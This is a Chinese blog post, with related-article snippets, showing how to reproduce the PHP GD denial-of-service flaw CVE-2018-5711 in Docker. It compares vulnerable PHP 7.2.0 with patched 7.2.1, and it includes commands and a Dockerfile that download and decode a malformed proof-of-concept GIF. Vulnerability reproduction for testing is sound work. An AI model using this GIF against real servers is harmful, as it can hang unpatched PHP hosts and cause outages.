php 2018 5711,使用 Docker 测试 PHP CVE-2018-5711 漏洞

最新推荐文章于 2021-04-06 18:34:31 发布
最新推荐文章于 2021-04-06 18:34:31 发布
阅读量77 收藏
点赞数
文章标签: php 2018 5711

漏洞说明

编号为PHP CVE-2018-5711的漏洞能让运行PHP的服务器瞬间宕机,原理是gd库在遇到特定非法格式的gif图片时会耗尽CPU,影响范围如下:

PHP 5 < 5.6.33

PHP 7.0 < 7.0.27

PHP 7.1 < 7.1.13

PHP 7.2 < 7.2.1

其中列出的都是该系列的最高版本,也就是说几乎所有使用gd库的PHP都需要为此更新到最高版本。

下面介绍这个漏洞在Docker中验证的方法,需要强调,这里提供了非法格式的git图片文件,如果上传到没有更新的服务器,不排除服务器宕机的可能,造成经济损失将违反相关法律。

PHP 7.2.0版本中的漏洞

下载代码

git clone https://github.com/huzhenghui/Test-7-2-0-PHP-CVE-2018-5711.git

进入项目文件夹

cd Test-7-2-0-PHP-CVE-2018-5711

构建Docker镜像

docker build -t test-7-2-0-php-cve-2018-5711 .

构建成功后查看PHP版本

docker run --rm test-7-2-0-php-cve-2018-5711 -v

可以看到

PHP 7.2.0 (cli) (built: Jan 4 2018 01:20:58) ( NTS )

Copyright (c) 1997-2017 The PHP Group

Zend Engine v3.2.0, Copyright (c) 1998-2017 Zend Technologies

查看PHP中是否包含GD库

docker run --rm --entrypoint /bin/bash test-7-2-0-php-cve-2018-5711 -c 'php -m | grep -I gd'

如果包含则显示

gd

运行验证程序

docker run --rm test-7-2-0-php-cve-2018-5711 -r '"imagecreatefromgif(\"poc.gif\");"'

会看到程序卡死,由于Docker限制进程使用的系统资源,可能不会死机,不过需要使用docker kill命令杀死相关进程。

PHP 7.2.1版本中已经修好了

下载代码

git clone https://github.com/huzhenghui/Test-7-2-1-PHP-CVE-2018-5711.git

进入项目文件夹

cd Test-7-2-1-PHP-CVE-2018-5711

构建Docker镜像

docker build -t test-7-2-1-php-cve-2018-5711 .

构建成功后查看PHP版本

docker run --rm test-7-2-1-php-cve-2018-5711 -v

可以看到

PHP 7.2.1 (cli) (built: Jan 8 2018 23:13:17) ( NTS )

Copyright (c) 1997-2017 The PHP Group

Zend Engine v3.2.0, Copyright (c) 1998-2017 Zend Technologies

查看PHP中是否包含GD库

docker run --rm --entrypoint /bin/bash test-7-2-1-php-cve-2018-5711 -c 'php -m | grep -I gd'

如果包含则显示

gd

运行验证程序

docker run --rm test-7-2-1-php-cve-2018-5711 -r '"imagecreatefromgif(\"poc.gif\");"'

会看到程序报错

Warning: imagecreatefromgif(): 'poc.gif' is not a valid GIF file in Command line code on line 1

Dockerfile说明

两个示例的Dockerfile的差别仅在于版本,完整的Dockerfile如下:

FROM php:7.2.0

MAINTAINER huzhenghui hu@daonao.com

RUN apt-get update && \

apt-get install -y libpng-dev xxd && \

docker-php-ext-install gd && \

curl https://raw.githubusercontent.com/huzhenghui/Test-7-2-0-PHP-CVE-2018-5711/master/poc -o /poc && \

xxd -r /poc /poc.gif

首先设置基础镜像

FROM php:7.2.0

维护者信息

MAINTAINER huzhenghui hu@daonao.com

更新包管理器

apt-get update

按装包,其中libpng-dev用于编译gd扩展,xxd用于从文本文件生成非法格式文件,这种文件不适合原文在网络传播,需要转一下码。

apt-get install -y libpng-dev xxd

安装gd扩展,此处使用docker提供的工具

docker-php-ext-install gd

下载示例文件转码后的文件

curl https://raw.githubusercontent.com/huzhenghui/Test-7-2-0-PHP-CVE-2018-5711/master/poc -o /poc

还原示例文件

xxd -r /poc /poc.gif

我还有头发呢
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2018-5711理解与复现
heySister
11-03 1053
写在前面 这个CVE复现起来很简单的,直接把Orange大大的两条指令在有漏洞PHP版本上跑一下就可以看到效果了。 复现之后,大致看了一下代码,感觉没有太多收获…所以决定调试一下PHP 的gd 扩展的源代码,理解一下到底是怎么导致了这个漏洞点的产生。虽然期间踩了不少坑,但确实是一次不错的尝试。 PHP源码调试新技能get~ Window下PHP源码编译 这部分工作,主要参考了链接: https...
php+cve+2018+5711,最近GD库拒绝服务漏洞分析与EXP构造(CVE-2018-5711)
weixin_30932183的博客
04-06 472
0x00 前言最近爆出PHP GD库拒绝服务0x01There is a do-while in file `ext/gd/libgd/gd_gif_in.c` and function `LWZReadByte_`do{sd->firstcode = sd->oldcode =GetCode(fd, &sd->scd, sd->code_size, FALSE, ...
php cve 2018 5711,使用 Docker 测试 PHP CVE-2018-5711 漏洞
weixin_42553588的博客
03-10 85
漏洞说明编号为PHP CVE-2018-5711漏洞能让运行PHP的服务器瞬间宕机,原理是gd库在遇到特定非法格式的gif图片时会耗尽CPU,影响范围如下:PHP 5 < 5.6.33PHP 7.0 < 7.0.27PHP 7.1 < 7.1.13PHP 7.2 < 7.2.1其中列出的都是该系列的最高版本,也就是说几乎所有使用gd库的PHP都需要为此更新到最高版本。下面...
使用 Docker 测试 PHP CVE-2018-5711 漏洞
胡争辉
02-01 2142
漏洞说明 编号为PHP CVE-2018-5711漏洞能让运行PHP的服务器瞬间宕机,原理是gd库在遇到特定非法格式的gif图片时会耗尽CPU,影响范围如下: PHP 5 PHP 7.0 PHP 7.1 PHP 7.2 其中列出的都是该系列的最高版本,也就是说几乎所有使用gd库的PHP都需要为此更新到最高版本。 下面介绍这个漏洞Docker中验证的方法,需要强调,这里提供了
EPoD: 以太坊Geth客户端拒绝服务漏洞 (CVE-2018-12018)
Fly_鹏程万里
07-15 957
迄今为止,PeckShield发现了很多严重的智能合约漏洞。除了智能合同外,以太坊生态系统还包括其他各种可能受到攻击的组件。显然,一个这样的组件是以太坊的核心,也就是每个以太坊节点上运行的底层客户端软件。如果攻击者使某个以太坊客户端/节点崩溃,那么此客户端/节点提供的计算能力也随之消失。如果大量以太坊的客户/节点突然间断线,他们相应的计算能力可能会立即失效,从而严重干扰以太坊的整个运营。在撰写本文...
docker-compose php7.3.4-fpm+nginx+mysql配置
09-07
docker-compose php7.3.4-fpm+nginx+mysql配置
使用 docker-compose 一键安装 php环境.zip
最新发布
04-30
docker安装 docker安装方法有多种,下面列举在Windows和Linux系统中的安装步骤:12 Windows系统中的安装方法: 对于Windows Server系统,可以使用Microsoft发布的PowerShell模块DockerMicrosoftProvider来安装...
bitnami-docker-php-fpm:Bitnami PHP-FPM Docker映像
02-12
什么是PHP-FPM? PHP-FPM(FastCGI流程管理器)是另一种PHP FastCGI实现,具有一些其他功能,可用于各种规模的站点... DR $ docker run -it --name phpfpm -v /path/to/app:/app bitnami/php-fpmDocker撰写$ curl -sSL ...
docker-compose部署php项目实例详解
10-16
在本篇文章里小编给大家整理了关于docker-compose部署php项目的相关实例以及代码内容,有需要的朋友们可以学习参考下。
php GD库快速消耗CPU资源漏洞 CVE-2018-5711测试
05-04 445
漏洞说明: 用一张GIF图片就可导致服务器发生崩溃直至宕机,在现实中非常容易利用。 影响版本: PHP 5 < 5.6.33 PHP 7.0 < 7.0.27 PHP 7.1 < 7.1.13 PHP 7.2 < 7.2.1 漏洞细节: 漏洞存在于文件ext/gd/libgd/gdgifin.c中,其中在LWZReadByte_函数中存在一个循环(w...
CVE-2018-5711:PHP GD库拒绝服务漏洞
weixin_34087301的博客
02-08 553
阿里云发布的PHP高危漏洞 这肯定要修补啊,官方解决方案就是升级到最新版 升级过程就不说了编译----安装期间各种BUG,很恶心 事后,觉得这漏洞还挺好,就给大家转载下有时间的可以自己测试下不要捣蛋哦,小朋友们 PoC 下载捣蛋文件$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif 本机函数测试$ php -r 'imagecreatefro...
php服务器崩溃,PHP载入GIF图像造成服务器宕机(CVE-2018-5711)的漏洞复现
weixin_31532363的博客
03-17 172
参考链接:今日看新漏洞发现一个UC编辑部的标题,CVE-2018-5711:一张GIF图片就能让服务器宕机的PHP漏洞,赶紧点卡看看是啥。经过了解发现,该漏洞有一定攻击面,攻击方式为DDoS。漏洞背景:漏洞由台湾Web漏洞挖掘大牛Orange Tsai发现。漏洞编号:CVE-2018-5711,它能用一张GIF图片就可导致服务器发生崩溃直至宕机,在现实中非常容易利用。漏洞影响的PHP版本:包含以下...
php 2018 5711,最近GD库拒绝服务漏洞分析与EXP构造(CVE-2018-5711)
weixin_42322686的博客
04-06 140
摘要最近爆出PHP GD库拒绝服务攻击漏洞,影响的版本比较多。官方上有漏洞的报告,但是看下来还是有不懂的地方,于是下载源码自己分析下。0x00 前言最近爆出PHP GD库拒绝服务攻击漏洞,影响的版本比较多。官方上有漏洞的报告,但是看下来还是有不懂的地方,于是下载源码自己分析下。0x01 漏洞分析There is a do-while in file `ext/gd/libgd/gd_gif_in....
PHP载入GIF图像造成服务器宕机(CVE-2018-5711)的漏洞复现
weixin_30266885的博客
02-01 440
参考链接: http://www.freebuf.com/vuls/161262.html 今日看新漏洞发现一个UC编辑部的标题,CVE-2018-5711:一张GIF图片就能让服务器宕机的PHP漏洞,赶紧点卡看看是啥。 经过了解发现,该漏洞有一定攻击面,攻击方式为DDoS。 漏洞背景: 漏洞由台湾Web漏洞挖掘大牛Orange Tsai发现。 漏洞编号:CVE-201...
PHP CVE-2018-5711 - Hanging Websites by a Harmful GIF(Dos)
3569
01-24 1451
http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html Affected All PHP version PHP 5 PHP 7.0 PHP 7.1 PHP 7.2 Vulnerability Details The vulnerability is on the file e
php更新到7.2后遇到的问题
qq_41756580的博客
05-30 394
前两天发现服务器有漏洞,需要升级服务器,服务器使用的是wamp的集成环境,直接把wamp升级到3.1.9的了,php+mysql+apache都升级了。 php是升级到7.2.18了,结果一打开系统,问题就来了,后来网上一查,php到7.2版本后做了以下改动: 1.each()函数被废弃。解决方法,自己写一个相同功能的函数: function func_new_each($array){ ...
PHP的核心Zend Engine
卧龙居
02-22 7272
相信很多人都听说过 Zend Engine 这个名词,也有很多人知道 Zend Engine 就是 PHP 语言的核心,但若要问一句:Zend Engine 到底存在于何处?或者说,Zend Engine 究竟是在什么时候怎么发挥作用让 PHP 源码输出我们想要的东西的? Zend引擎是PHP实现的核心,提供了语言实现上的基础设施。例如:PHP的语法实现,脚本的编译运行环境, 扩展机制以及内存管
thinkphp3.2.3漏洞_实操web漏洞验证——OpenSSL POODLE 漏洞
weixin_39788740的博客
11-24 1337
今天我们来讲一下实战操作验证OpenSSL POODLE漏洞的方法,以下的操作实例都是通过漏洞扫描系统,扫描出存在相应漏洞的站点URL,由于系统存在一些误报,所以必须经过人工验证,才能确定漏洞的确存在。一、漏洞概述POODLE即Padding Oracle On Downgraded Legacy Encryption.是安全漏洞(CVE-2014-3566)的代号,俗称“贵宾犬”漏洞。 此漏洞是...
OpenSSH 安全漏洞(CVE-2018-15473)
08-04
OpenSSH 安全漏洞(CVE-2018-15473)是一个影响OpenSSH版本小于7.7的漏洞。要复现这个漏洞,可以按照以下步骤进行操作: 1. 首先,需要搭建漏洞环境。可以使用vulhub提供的Docker镜像来搭建环境。具体的操作命令如下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值